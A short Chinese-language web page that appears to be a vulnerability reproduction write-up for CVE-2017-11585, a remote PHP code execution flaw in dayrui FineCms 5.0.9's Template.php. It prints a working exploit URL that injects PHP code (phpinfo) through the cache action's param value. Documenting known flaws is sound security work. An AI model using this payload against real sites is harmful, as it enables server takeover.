FineCms 5.0.9远程PHP代码执行漏洞CVE-2017-11585

漏洞描述

dayrui FineCms 5.0.9通过对库/Template.phpaction=cache请求中的param参数进行远程PHP代码执行,也就是注入漏洞CVE-2017-11585
 


 

漏洞复现

文件/finecms/dayrui/libraries/Template.php函数 list_tag action=cache,我们可以绕过一些过滤器并将参数$_param插入 函数并执行 php 代码。
 

http://finecms.com/index.php?c=api&m=data2&auth=820686a208b89d4c2f8b6f2622eff83e¶m=action=cache%20name=MEMBER.1'];phpinfo();$a=['1

图片[1]-FineCms 5.0.9远程PHP代码执行漏洞CVE-2017-11585-孤勇者社区

 

------本页内容已结束,喜欢请分享------

感谢您的来访,获取更多精彩文章请收藏本站。

© 版权声明
THE END
喜欢就支持一下吧
点赞10赞赏 分享
评论 共2条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情代码图片
    • 头像长严0
    • 头像场王0